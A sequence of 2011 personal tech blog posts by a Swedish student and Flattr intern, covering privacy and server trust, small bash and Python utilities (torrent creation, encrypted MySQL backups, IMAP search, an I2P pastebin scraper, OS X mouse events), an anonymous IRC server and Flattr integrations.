<p><img src="/images/haskell.png" title="&quot;Starships!!1!&quot;" alt="&quot;Starships!!1!&quot;" /><br />
Installing the Glasgow Haskell Compiler right now. <br />
On monday I begin studing Functional Programming (Haskell) and cryptography on <span class="caps">LTH</span>. <br />
Dead excited. So hopefully there will show up a few Haskell related posts here in the near future.</p>Do NOT trust the server2011-10-20T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/20/do-not-trust-the-server<h2>Do <span class="caps">NOT</span> trust the server</h2>
<p class="publish_date">20 Oct 2011</p>
<p>I have sometimes stumbled across the comment in privacy aware <span class="caps">IRC</span> channels and forums that <i>&#8220;if you do not trust the server, change server&#8221;</i>. <br />
I do not agree with this, I think that it is important that you <strong>should never trust the server</strong> if you are handling sensitive information.</p>
<p>Always try to use protocols that protect you <strong>End-to-End</strong> to avoid the need of server trust. <br />
Most communication protocols do not support this i.e. Jabber where all traffic is tunnelled through the server (please correct me if I am wrong), Skype (<a href="https://secure.wikimedia.org/wikipedia/en/wiki/Skype#Service_in_the_People.27s_Republic_of_China">i.e. decrypting traffic for China</a>), E-mail and so on. <br />
There are patches and ways to avoid this though i.e <span class="caps">PGP</span> and <span class="caps">OTR</span> (<em>weak against MitM-attacks</em>).</p>
<p>If a protocol requires you to rely on a server for protection then expect that data to leak. The server provider <strong><span class="caps">WILL</span></strong> loose your password in clear text, loose logs or decrypt your messages for governments, employes, hackers or anyone else who cares to listen.</p>
<p>Numerous examples of companies who ask you to trust them for anonymity or security has been proven flawed. Examples are <a href="https://secure.wikimedia.org/wikipedia/en/wiki/Hushmail#Controversy">Hushmail</a> and <a href="https://torrentfreak.com/vpn-providers-mull-fraudster-database-in-wake-of-lulzec-fiasco-111006/">Hide My Ass</a>. <br />
The problem is that the reaction often is surprisingly small from the public and the users. If companies like these can doesn&#8217;t protect you, what role do they then serve? It is all pseudo-safety.</p>
<p>Server trust is a big problem with anonymous <span class="caps">VPN</span> providers, they live of your trust. If you do not trust them not to hand out information or log then they are useless. In this case it is hard to avoid the trust relationship (if you do not use <a href="https://www.torproject.org/"><span class="caps">TOR</span></a> or <a href="https://i2p2.de">I2P</a> <em>but watch out for exit node on these darknets, you have the same problem there as with the <span class="caps">VPN</span> providers.</em> Use hidden services (eepsites), or <span class="caps">TLS</span> connections if visiting vanilla internet).</p>Create and send torrent via OS X terminal2011-10-18T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/18/sending-file-as-torrent<h2>Create and send torrent via OS X terminal</h2>
<p class="publish_date">18 Oct 2011</p>
<h3>Why?</h3>
<p>Sending a big file to a friend is sometimes tricky.<br />
Therefore I wrote a small bashscript that creates a .torrent file of the file I want to send.<br />
After that it opens it in the torrent client of my choice and finally creates a new email and attaches the torrent file to it. <br />
The only thing left for me to do after this is to send the email to the person I want to share my file with!<br />
<br />
<center><a href="https://www.xkcd.com/949/"><img src="http://imgs.xkcd.com/comics/file_transfer.png" width="300px"/></a></center>
<h3>How?</h3>
<p><strong>First</strong> of all it has a dependency called <a href="https://code.google.com/p/pyroscope/wiki/InstallReleaseVersion">pyscope</a> it can be installed with &#8216;easy_install pyscope&#8217;. <br />
<strong>Next</strong> I put this code in my <em>~/.bash_profile</em></p>
<pre class="prettyprint linenums">
function createtorrent() {
FILENAME=$1
mktor -p $FILENAME udp://tracker.openbittorrent.com:80/announce
open $FILENAME.torrent
echo "tell application \"Mail\"
activate
set MyEmail to make new outgoing message with properties {visible:true, content:\"Torrent file transfer \"}
tell MyEmail
make new attachment with properties {file name:((\"$FILENAME.torrent\" as POSIX file) as alias)}
end tell
end tell
" | osascript
}
</pre>
<p><strong>Now</strong> it can be executed with<br />
<pre class="terminal">createtorrent fileIwantToSend.avi</pre></p>
</p>Convergence2011-10-11T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/11/convergence<h2>Convergence</h2>
<p class="publish_date">11 Oct 2011<br />
<center><br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/Z7Wl2FW2TcA" frameborder="0" allowfullscreen></iframe></p>
</center>
<p><br />
Just finished watching this speech from BlackHat on weaknesses in <span class="caps">SSL</span> and the CA authority model. <br />
I have also begun trying out the <a href="http://convergence.io">Convergence</a> software mentioned in the video. <br />
Here are some extra Convergence notaries of you want to try it out on the <a href="https://crypto.is/projects/network/">crypto.is project</a></p>Backup mySQL with BASH2011-10-10T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/10/backup-mysql-with-bash<h2>Backup mySQL with <span class="caps">BASH</span></h2>
<p class="publish_date">10 Oct 2011</p>
<p>Simple <span class="caps">BASH</span> script to backup mySQL database and save it encrypted<br />
<pre class="terminal">
#!/bin/bash
DATE=$(date +%s)
BACKUPFILEZ=/backup/dump${DATE}.sql
mysqldump -u root --all-databases --hex-blob --complete-insert -p > backup.sql > $BACKUPFILEZ
gpg --encrypt $BACKUPFILEZ
rm $BACKUPFILEZ
</pre>
<br />
Note: This script stil needs you to manually enter database password and what public key to use for encryption (this can easily be added to the script). Also I recommend that you save the backups externally (and not in &#8220;/backup&#8221;), and for this I would recommend &#8220;scp&#8221;.</p>Trying out Piwik2011-10-09T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/09/trying-out-piwik<h2>Trying out Piwik</h2>
<p class="publish_date">09 Oct 2011</p>
<p>I decided to try out <a href="http://piwik.org/">Piwik</a> for my blog, in an attempt to &#8220;reclaim my data&#8221;. <br />
It is an Open Source (<span class="caps">GPL</span>) alternative to Google Analytics. I haven&#8217;t removed the GA script from the blog just yet until I know it is working properly.</p>
<p>So far it seems to work really well with a beautiful interface and it doesn&#8217;t seem to lack in functionality either, I&#8217;ll report back here when I have been using it more.</p>Write every day!2011-10-04T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/10/04/write-every-day<h2>Write every day!</h2>
<p class="publish_date">22 Jul 2011</p>
<p>Unable to sleep well last night I put together this website with the aim to help inspire people to write every day. <br />
<center><a href="http://whatshouldi.writeabouttoday.com">What should I write about today</a><br />
<a href="https://img.skitch.com/20111004-pbtxf5gh3911m9bywrrxi9gxrk.jpg" target="_blank"><img src="https://img.skitch.com/20111004-pbtxf5gh3911m9bywrrxi9gxrk.jpg" width="400" alt="What to write about today" /></a></center>
<p>The concept is simple, the page randomly selects a one sentence plot from my database and suggests it as an idea on what to write about. <br />
For more info about the idea I recommend <a href="http://whatshouldi.writeabouttoday.com/about.php">the about page</a>.</p>
</p>Transmission-bt feature request2011-10-03T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/03/transmission-torrent-feature-requests<h2>Transmission-bt feature request</h2>
<p class="publish_date">03 Oct 2011</p>
<p>
<p>Two feature requests for the bittorrent client Transmission:</p>
<ul>
<li>Support for proxies! I want to be able to connect my torrent program to a <span class="caps">SOCKS</span> proxy!</li>
<li><del>Make it possible to select single torrents to use <span class="caps">DHT</span> and <span class="caps">PEX</span> and not activate it for all of them. Most private trackers ban the use of <span class="caps">DHT</span> and <span class="caps">PEX</span> and most public trackers rely on them beeing there. It is rather annoyning to have to use seperate torrent clients for public and private trackers.</del><br />
Just noticied that the last one is supported through the <em>privacy</em> flag on torrent files.</li>
</ul>
<p><img src="/images/dht.jpg" title="Transmission support privacy flag" alt="Transmission support privacy flag" /></p>
<p>And before I end this blog post I also want to recommend the <a href="https://code.google.com/p/transmisson-remote-gui/">transmission remote <span class="caps">GUI</span></a>. A great way to run your tranmission on a server and stil use it integrated on your normal computer, without having trouble with P2P-blocking networks and battery drainage on laptops.</p>
</p>Crescent 1948 Valkenburg2011-09-29T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/09/29/crescent-1948-valkenburg<h2>Crescent 1948 Valkenburg</h2>
<p class="publish_date">29 Sept 2011</p>
<p>
<p>My latest love affair. A <em>Crescent 1948 Valkenburg</em> .<br />
<center><a href="/images/valkenburg.jpg" target="_blank"><img src="/images/valkenburg.jpg" width="400" alt="<3" /></a></center><br />
Now I just have to buy some new lights and a couple of reflexes to be left alone by the notoriously tenacious Lund police. Any recommendations, please leave a comment below?</p></p>Leaving for Germany2011-09-03T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/09/03/leaving-for-germany<h2>Leaving for Germany</h2>
<p class="publish_date">3 Sept 2011</p>
<p>
<p>Leaving for Germany tomorrow. First Hamburg (St Pauli) and then of to Heidelberg and Berlin, and probably a few more stops. <br />
I&#8217;ll be gone for about three or four weeks, it is all very loosly planned. If you care to grab a beer and talk about programming, politics, Flattr or whatever, drop me an <a href="mailto:christopher@kejsarmakten.se">email</a>.</p>
</p>Thank you Flattr, it has been a great summer!2011-08-27T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/08/27/thank-you-flattr<h2>Thank you Flattr, it has been a great summer!</h2>
<p class="publish_date">27 Aug 2011</p>
<p>Well, thats it for now. This Wednesday is my last day at <a href="http://flattr.com">Flattr</a> in Malmö. I&#8217;ve worked there since June and spent the entire summer in the sweetest software development office ever! <br />
It makes me quite emotional writing this because it will be really hard leaving all the great people at Flattr to continue my studies on a Master in Computer Science. <br />
<center><a href="/images/flattr1.jpg" target="_blank"><img src="/images/flattr1.jpg" width="400" alt="<3" /></a></center><br />
It has been such a <b>wonderful experience</b> being a part of the phenomenon that is Flattr. Working on a team set out to improve the world. The atmosphere in the Flattr office is a really inspiring and unique. With an unhieractical structure and relaxed attitude creativity is flourishing and I really felt included in the company and the debates on the future of Flattr.</p>
<p>The software development environment is really creative and open and a thirst for knowledge drives the team. If I would ever put together a development team the atmosphere in the Flattr office is the one I would strive for. The sense of trust in you and the amount of freedom given really maximize productivity and all the helpful devs makes it one hell of a team.</p>
<p>Thanks for the <b>laughs</b>, <b>jokes</b>, <b>critique</b>, <b>discussions</b>, <b>gaming</b>, <b>Club Mate</b>, <b>coffee</b>, <b>beer</b>, <b>Lego</b>, <b>board gaming</b>, all the <em><b>&#8216;awesome&#8217;</b></em> and thanks for your trust in me and my ability. <br />
I hope I will be back one day!</p>
<p><em>Tack Linus, Peter, Simon, Joel, Leif, Per, Pelle, Maria, Niklas, Josef och Marie. Ni har verkligen gjort det här till en riktigt fin sommar som jag kommer minnas med glädje.</em></p>
<p>Here are some pictures from the office this summer. <br />
<center><br />
<a href="/images/flattr2.jpg" target="_blank"><img src="/images/flattr2.jpg" width="400" height="" alt="Pair (bro-)programming with Per in the Fatboys while Josef and Pelle builds lego/perls" /></a><br />
<em>Pair (bro-)programming with Per in the Fatboys while Josef and Pelle builds lego/perls</em><br />
<a href="/images/flattr3.jpg" target="_blank"><img src="/images/flattr3.jpg" width="400" alt="Dark Science, divining by zero and making recursive images." /></a><br />
<em>Dark Science, dividing by zero and making recursive images</em><br />
<a href="/images/flattr4.jpg" target="_blank"><img src="/images/flattr4.jpg" width="400" alt="Leif dubble facepalming and Simon haning from the roof, normal day at office." /></a><br />
<em>Leif double facepalming and Simon hanging from the ceiling, normal day at the office</em> <br />
<a href="/images/flattr5.jpg" target="_blank"><img src="/images/flattr5.jpg" width="400" alt="3D printing spam" /></a> <br />
<em>3D printing spam</em><br />
<a href="/images/flattr6.jpg" target="_blank"><img src="/images/flattr6.jpg" width="400" alt="Chill out Pug is chill" /></a> <br />
<em>My Pug Medea chills out on the Flattr rugs</em><br />
<a href="/images/flattr7.jpg" target="_blank"><img src="/images/flattr7.jpg" width="400" alt="Ninja :D" /></a> <br />
<em>Employed as Ninja</em><br />
<a href="/images/flattr8.jpg" target="_blank"><img src="/images/flattr8.jpg" width="400" alt="Helicopter uses ramm... IT IS INAFFECTIVE!" /></a> <br />
<em>Leif using ninja skillz to avert helicopter attack</em><br />
<a href="/images/flattr10.jpg" target="_blank"><img src="/images/flattr10.jpg" width="400" alt="ROBOTZZZ!" /></a> <br />
<em>Board games and Robots!</em><br />
<a href="/images/flattr9.jpg" target="_blank"><img src="/images/flattr9.jpg" width="400" alt="Dangerous but happy Simon" /></a> <br />
<em>Simon enjoying shooting other devs&#8230;</em></p>
</center>
<p>I&#8217;ll miss the lot of you.</p>Searching IMAP with Python2011-08-23T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/08/23/searching-IMAP-with-python<h2>Searching <span class="caps">IMAP</span> with Python</h2>
<p class="publish_date">23 Aug 2011</p>
<p>
<pre class="terminal">
M = imaplib.IMAP4_SSL("imap.mail.com")
M.login(getpass.getuser(), getpass.getpass())
M.select()
typ, data = M.search(None, '(SUBJECT "test")')
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %s\n%s\n' % (num, data[0][1])
M.close()
M.logout()
</pre>
<p>This will search all emails for one with the subject line &#8220;test&#8221;. <br />
Change the &#8216;(<span class="caps">SUBJECT</span> &#8220;test&#8221;)&#8217; to whatever you want to search for/in. <br />
There is a good comprehensible list of the commands in the <a href="http://php.net/manual/en/function.imap-search.php"><span class="caps">PHP</span> documentaion</a>. <br />
The things in the &#8220;Criteria&#8221; list can all be used insted of the &#8217;(<span class="caps">SUBJECT</span> &#8220;test&#8221;) string.</p>
</p>Live Coding with Notch2011-08-22T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/08/22/notch-live-coding<h2>Live Coding with Notch</h2>
<p class="publish_date">22 Aug 2011</p>
<p>I can&#8217;t help loving the concept of live coding. I&#8217;ve had a hard time understaning fans of e-sports (as well as sports) and watching streamed games until I watched <a href="http://notch.tumblr.com/">Notch</a> live stream a coding session a while back. <br />I had totally forgotten about the concept until this weekend when Notch streamed another coding session.<br />This time it was part of Ludum Dare, a competition to create a game in 48 hours.<br />
Notch wrote a game called <a href="http://notch.tumblr.com/post/9251960534/prelude-of-the-chambered">Prelude of the Chambered</a>, it is a nice retro Wolfenstein/Minecraft looking Java game. You can play it <a href="https://s3.amazonaws.com/ld48/index.html">here</a> and here is the <a href="s3.amazonaws.com/ld48/PoC_source.zip">source code</a><br />
<br />There is a recording on YouTube from the live coding session. Crack open a beer and enjoy ultra geekness. <br/>Who knows, you might acctually learn something. <br />
<iframe width="560" height="345" src="http://www.youtube.com/embed/QYBUCYUNn3Q" frameborder="0" allowfullscreen></iframe><br /></p>Open Graph Fetcher2011-07-22T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/07/22/open-graph-fetcher<h2>Open Graph Fetcher</h2>
<p class="publish_date">22 Jul 2011</p>
<p>Another Open Source day in the Flattr office!<br />
I experimented a little with the Open Graph standard and wrote an python class that parses a website and looks for Open Graph tags. It also has some extra features like automatic caching of images.<br />
You can find the source code <a href="https://github.com/melpomene/OpenGraph-fetcher">on Github</a>. </p>Problems after upgrade to OS X Lion2011-07-20T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/07/20/problems-after-OS-X-lion-upgrade<h2>Problems after upgrade to OS X Lion</h2>
<p class="publish_date">24 Mar 2011</p>
<p>Here are a few things that broke after I upgraded my <span class="caps">MBP</span> to OS X Lion.<br />
Any help with solving the issues would be highly appreciated. </p>
<ul>
<li><b>Three finger slide</b>, one of my most missed features from Snow Leopard. The three finger slide which activated &#8220;Back&#8221; in browsers. <br />
I am currently unable to reenable this, but I have noticied that Safari has got this function (with one finger). If there are any fixes to reenable this in Firefox or Chrome please leave a comment!</li>
<li><b>GPGMail</b> stopped working. Had to install Thunderbird to continue my encrypted correspondence (haven&#8217;t been able to get this working either atm).</li>
<li><b>Time Machine</b> stopped working. I&#8217;ve got an Ubuntu server running as Time Machine disc and since the upgrade my <span class="caps">MBP</span> has been complaining about lacking <span class="caps">AFP</span> function support. <img src="/images/afp_error.jpg" alt="Time Machine kunde inte slutföra säkerhetskopieringen." /></li>
</ul>
<p>A lot of stuff broke, but ey, we got full disc encryption and the posibility to resize windows in all the corners!</p>Flattr button now on the SoundCloud widget2011-07-17T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/07/17/soundcloud-flattr-integration<h2>Flattr button now on the SoundCloud widget</h2>
<p class="publish_date">17 Jul 2011</p>
<p>As I have written about before, Flattr now has a new feature that lets you integrate with <b>SoundCloud</b>.<br />
I&#8217;m not a musician myself, but this is great news for all artist uploading their tracks to SoundCloud and who want to let their listeners support them financially.<br /> <b>What&#8217;s new</b> though is that now SoundCloud shows a nice Flattr logo in you player widget if you integrate the services.<br />
<b>Great!</b> No need for an extra flattr button for each song! <br />
It&#8217;s really simple to activate! Just connect your Flattr and Soundcloud account <a href="https://flattr.com/settings/connections">here</a> (but don&#8217;t forget that if you submit new songs to SC and you want to give them Flattr buttons as well you have to connect your accounts again).</p>
<p><a href="/images/flattr_soundcloud.jpg"><img src="/images/flattr_soundcloud.jpg" width="400px" /></a><br />
<p>Pretty sweet huh?</p></p>Flattr on wordpress.com, ShareDaddy and on AddThis. 2011-07-04T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/07/04/flattr-on-wordpress-sharedaddy-addthis<h2>Flattr on wordpress.com, ShareDaddy and on AddThis.</h2>
<p class="publish_date">04 Jul 2011</p>
<p><a href="http://flattr.kejsarmakten.se/wordpress">This tool</a> helps you add Flattr buttons on Wordpress.com and everywhere where you use ShareDaddy. <br />
<a href="http://flattr.kejsarmakten.se/addthis">And this tool</a> helps you integrate your flattr button in AddThis code. </p>
<p>I hope you find some use for them!</p>Flattr widget for Blogger.com2011-07-01T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/07/01/flattr-widget-for-blogger<h2>Flattr widget for Blogger.com</h2>
<p class="publish_date">01 Jul 2011</p>
<p><a href="http://flattr.kejsarmakten.se/blogger/">I wrote a flattr Widget for blogger.com (blogspot.com)</a>. It adds a general flattr button for your site which you can drag around like a normal Gadget. <br />
And if you want it can also add flattr buttons to all your blog posts.<br />
If you like it Flattr the project here:<br /> <a class="FlattrButton" style="display:none;" href="http://flattr.kejsarmakten.se/blogger/"></a><br />
<noscript><a href="http://flattr.com/thing/331822/Flattr-widget-for-Blogger" target="_blank"><br />
<img src="http://api.flattr.com/button/flattr-badge-large.png" alt="Flattr this" title="Flattr this" border="0" /></a></noscript></p>SoundCloud and Flattr sitting in a tree...2011-06-17T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/06/17/soundcloud-and-flattr<h2>SoundCloud and Flattr sitting in a tree&#8230;</h2>
<p class="publish_date">17 Jun 2011<br />
<p><b>Update: This feature is now integrated with flattr.com, read more about it <a href="http://blog.flattr.net/2011/06/new-feature-connect-flattr-to-soundcloud/">here</a>.</b></p><br />
<p><a href="http://flattr.kejsarmakten.se/soundcloud/" rel="me">Here is a webapp</a> I wrote which lets you submit all of your <a href="http://soundcloud.com">SoundCloud</a> tracks to <a href="http://flattr.com">Flattr</a>.<br />
It can also redirect the &#8220;Buy&#8221;-link on your songs to point to your Flattr Thing and it can drop a comment on your track to tell all your listeners that they now can show their love for your music throught Flattr! </p></p>Hyde Flattr auto submission2011-06-09T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/06/09/hyde-flattr-auto-submission<h2>Hyde Flattr auto submission</h2>
<p class="publish_date">09 Jun 2011</p>
<p>I&#8217;m working at <a href="https://flattr.com">Flattr</a> this summer. A great company with visions to improve the world!<br />
Anyway, today was Open Source day at Flattr and all of the developers coded away on different project. <br />
I wrote this Flattr auto submission layout for the static site generator Hyde. <br />
Fork it on <a href="https://github.com/melpomene/Flattr-auto-submit-for-Hyde">GitHub</a>!</p>Hack day på Blekingska Nationen2011-06-01T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/06/01/hack-day-blekingska-nationen<h2>Hack day på Blekingska Nationen</h2>
<p class="publish_date">01 Jun 2011<br />
<p><a href="/images/blekingska_wall.jpg"><img src="/images/blekingska_wall.jpg" alt="Bilden saxxad från Qurator.se" height="150px" style="float:left;margin-right:5px;" /></a><b>Sitter du med fast i Lund i sommar och vill låta kreativiteten flöda lite?</b><br />
Kom bort till <a href="http://blekingska.se">Blekingska Nationen</a> den andra Juli och delta i Blekingska Hack Day som jag anordnar.<br />
Temat för dagen är Mash-ups. Vi skriver i små grupper ett gäng applikationer på 6-7 timmar varefter vi avrundar med grillning om folk känner för det.<br />
Är du intresserad kan du läsa mer om det <a href="http://piratepad.net/hackdayblekingska">här</a> eller på <a href="https://www.facebook.com/event.php?eid=157950890939515">facebook</a>. <br/>
Är du sugen på att delta så glöm inte att trycka &#8216;attending&#8217; på facebook, maila mig eller lämna kontaktuppgifter i Piratepad;en</p></p>I2P Pastebin parser2011-05-29T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/05/29/i2p-pastebin-parser<h2>I2P Pastebin parser</h2>
<p class="publish_date">27 May 2011</p>
<p>I forked a Pastebin parser I read about on <a href="http://news.ycombinator.com/item?id=2595066">Hacker News</a> and enabled it to parse the (I only know of one) pastebin hosted on <a href="http://i2p2.de">I2P</a>. <br />
I thought that I would stumble upon lots of more interesting stuff on the I2P pastebin than on the vanillla internet version. <b>Turns out I didn&#8217;t.</b> <br />
The anonymous people chilling out on I2P seems like a really friendly bunch :).<br />
The only thing I really found of interest is a script to spoof <span class="caps">MAC</span> addresses on AirPorts. (Then again there aren&#8217;t alot of pastes in the i2p pastebin (yet!))<br /><br />
<a href="https://github.com/melpomene/I2P-Pastebin-scraper">Here</a> is the code to parse the I2P pastebin (you need to have BeautifulSoup and an I2P proxy running on 4444 for this to work).<br />
<pre class="prettyprint lang-python">
import BeautifulSoup
import urllib2
import time
import Queue
import threading
import sys
import datetime
import random
import os
pastesseen = set()
pastes = Queue.Queue()
proxy = {"http": "http://127.0.0.1:4444/"}
handler = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(handler)
def downloader():
while True:
paste = pastes.get()
fn = "pastebinsi2p/%s-%s.txt" % (paste, datetime.datetime.today().strftime("%Y-%m-%d"))
content = opener.open("http://empth.i2p/pastebin/" + paste).read()
soup = BeautifulSoup.BeautifulSoup(content)
content = str(soup.find(id="content"))
if "requesting a little bit too much" in content:
print "Throttling... requeuing %s" % paste
pastes.put(paste)
time.sleep(0.1)
else:
f = open(fn, "wt")
f.write(content)
f.close()
delay = 1.1 # random.uniform(1, 3)
sys.stdout.write("Downloaded %s, waiting %f sec\n" % (paste, delay))
time.sleep(delay)
pastes.task_done()
def scraper():
scrapecount = 0
while scrapecount < 10:
html = opener.open("http://empth.i2p/pastebin/recent.php").read()
soup = BeautifulSoup.BeautifulSoup(html)
div = soup.find(id="recent")
ul = div.find("ul")
for li in ul.findAll("li"):
href = li.a["href"]
if href in pastesseen:
sys.stdout.write("%s already seen\n" % href)
else:
pastes.put(href)
pastesseen.add(href)
sys.stdout.write("%s queued for download\n" % href)
delay = 12 # random.uniform(6,10)
time.sleep(delay)
scrapecount += 1
num_workers = 1
for i in range(num_workers):
t = threading.Thread(target=downloader)
t.setDaemon(True)
t.start()
if not os.path.exists("pastebinsi2p"):
os.mkdir("pastebinsi2p") # Thanks, threecheese!
s = threading.Thread(target=scraper)
s.start()
s.join()
</pre>
<br />
It is forked from <a href="http://www.michielovertoom.com/python/pastebin-abused/">this blog post</a> (hope you don&#8217;t mind mate).</p>Anonymous IRC server2011-05-27T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/05/27/anoymous-irc<h2>Anonymous <span class="caps">IRC</span> server</h2>
<p class="publish_date">27 May 2011</p>
<p><a href="/images/i2psupport.png"><img src="/images/i2psupport.png" /></a><br />
<p>Everything needed should be explained here on <a href="http://kryptoanarki.se">kryptoanarki.se</a> or if you prefer darknets <a href="http://kryptoanarki.i2p">kryptoanarki.i2p</a>.<br />
The <span class="caps">IRC</span> server allows you to connect to it through the I2P darknet or as a <span class="caps">TOR</span> hidden service.<br />
Chrisk has a short guide how to connect with tor on is <a href="http://christopherkullenberg.se/?p=1916">blog</a>. <br />
I could find any good guides on how to connect with I2P (notetoself: write your own) but basically you go to <a href="http://localhost:7657/i2ptunnel/index.jsp">local tunnel configurations</a> and create a new client <span class="caps">IRC</span> client tunnel. Then you point it to kryptoanarki.i2p or the base64 code on the website. After this is done you can simply connect to localhost and the port you specified.<br />
To flattr the project please use this button: <br />
<a class="FlattrButton" style="display:none;" href="http://kryptoanarki.se"></a><br />
<noscript><a href="http://flattr.com/thing/289926/Anonymous-IRC-server" target="_blank"><br />
<img src="http://api.flattr.com/button/flattr-badge-large.png" alt="Flattr this" title="Flattr this" border="0" /></a></noscript><br />
and to flattr the blog use this one:</p></p>Press key with Python on OS X2011-05-22T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/05/22/generate-key-press-os-x-with-python<h2>Press key with Python on OS X</h2>
<p class="publish_date">22 May 2011</p>
<p>This is what I had to do to programmatically generate key pressed and mouse events on OS X with Python.<br />
First I had to download a Python wrapper around Objective C which I found <a href="http://pyobjc.sourceforge.net/downloads.html">here</a>. I downloaded the trunk (with svn) and then I navigated to the folder containing Quartz and ran the setup script. <br />
<pre class="terminal">
$ svn checkout http://svn.red-bean.com/pyobjc/trunk/
$ cd trunk/pyobjc/pyobjc-framework-Quartz
$ python setup.py install
</pre>
<br />
Checking out the trunk acctualy checks out a lot of files not not needed, but hey, better safe than sorry.<br />
After this was done I was able to import the Quart.CoreGraphics module in python.<br />
I borrowed this code snippet from <a href="http://www.geekorgy.com/index.php/2010/06/python-mouse-click-and-move-mouse-in-apple-mac-osx-snow-leopard-10-6-x/">here</a> to make sure it worked, and it did, like a charm. <br />
<pre class="terminal">
import sys
import os
import time
from Quartz.CoreGraphics import CGEventCreateMouseEvent
from Quartz.CoreGraphics import CGEventPost
from Quartz.CoreGraphics import kCGEventMouseMoved
from Quartz.CoreGraphics import kCGEventLeftMouseDown
from Quartz.CoreGraphics import kCGEventLeftMouseDown
from Quartz.CoreGraphics import kCGEventLeftMouseUp
from Quartz.CoreGraphics import kCGMouseButtonLeft
from Quartz.CoreGraphics import kCGHIDEventTap
def mouseEvent(type, posx, posy):
theEvent = CGEventCreateMouseEvent(None, type, (posx,posy), kCGMouseButtonLeft)
CGEventPost(kCGHIDEventTap, theEvent)
def mousemove(posx,posy):
mouseEvent(kCGEventMouseMoved, posx,posy)
def mouseclick(posx,posy):
mouseEvent(kCGEventLeftMouseDown, posx,posy)
mouseEvent(kCGEventLeftMouseUp, posx,posy)
def main():
mousemove(0,0)
if __name__ == '__main__':
main()
</pre><br />
<br />
Read more on how to use Quartz <a href="http://pyobjc.sourceforge.net/documentation/pyobjc-framework-Quartz/api-notes.html">here</a></p> Arduino joystick2011-05-22T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/05/22/arduino-joystick<h2>Arduino joystick</h2>
<p class="publish_date">22 May 2011</p>
<p>I have made some more progress on my <a href="/all/software/2010/11/09/arduino-sings.html">ardunio</a> <a href="/all/software/2011/01/09/ardunio-moves.html">&#8220;joystick&#8221;</a>.<br />
I have now added support for the joystick (and not just the buttons) and written an interface allowing it to work with the xte library on Linux computers. <br/>It is far from done, at the moment a keypress generates alot of mouse clicks (as you can see in the video) and it needs more work in the sensitivity on the joystick.<br />I will soon release the source code on GitHub (if I can manage to find the C code I have compiled to the arduino). </p>
<p>Here is a low-qual video of me demonstraiting the controller on Ubuntu 10.04.<br />
<iframe width="560" height="349" src="http://www.youtube.com/embed/UJ-Wwq4npRg" frameborder="0" allowfullscreen></iframe><br />
<br />
<b><span class="caps">UPDATE</span>:</b> I&#8217;ve got the damn thing running on OS X Snow Leopard too. Here is another low qual video of me demonstrating the joystick.<br />
<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Pgv_NHmfmQA?hl=sv&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Pgv_NHmfmQA?hl=sv&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br />
Maybe not the most jaw dropping project out there, but you have to excuse me, I am having too much fun ^^</p>The Absolute Sandman2011-05-17T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/05/17/the-absolute-sandman<h2>The Absolute Sandman</h2>
<p class="publish_date">17 May 2011</p>
<p>As soon as I get some cash&#8230;<br /> <a href="http://farm4.static.flickr.com/3239/2290328850_c752387d1e.jpg"><img src="http://farm4.static.flickr.com/3239/2290328850_c752387d1e.jpg" width="300px" alt="The Absolute Sandman" style="display:block; margin-left: auto; margin-right: auto;" /></a></p>Python ftp client2011-05-15T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/05/15/python-ftp-client<h2>Python ftp client</h2>
<p class="publish_date">15 May 2011</p>
<p>I started writing a terminal based <span class="caps">FTP</span> client in python a few days back. The idea is that it should support multiple servers allowing the user the search them all at once and automating the choice of server when a file is selected for download.<br />
The project is open source and can be found <a href="https://github.com/melpomene/FTPCircle/">here on github</a>. Feel free to help out, it is nowhere near done (really just a zero-day iteration atm).<br />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script><br />
<script src="/js/github.commits.widget-min.js"></script><br />
<script>
$(function () {
$('#github-commits').githubInfoWidget(
{ user: 'melpomene', repo: 'FTPCircle', branch: 'master', last: 5 });
});
</script>
<div id="github-commits"></div>
<p><br />
<p><b>Update:</b> <a href="http://sikevux.se/2011/05/open-source-is-great/">A nice read</a> about the joy of Open Source and a mention to this project. </p><br />
Here is a Flattr button for the project:<br />
<a class="FlattrButton" style="display:none;" href="http://blog.kejsarmakten.se/all/projects/2011/05/15/python-ftp-client.html"></a><br />
<noscript><a href="http://flattr.com/thing/277491/FTPCircle" target="_blank"><br />
<img src="http://api.flattr.com/button/flattr-badge-large.png" alt="Flattr this" title="Flattr this" border="0" /></a></noscript><br />
This one is for the blog in general:</p>
</p>Laptop stickers2011-05-13T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/05/13/laptop-stickers<h2>Laptop stickers</h2>
<p class="publish_date">13 May 2011<br />
<p>Got two new stickers for my new laptop. <br />
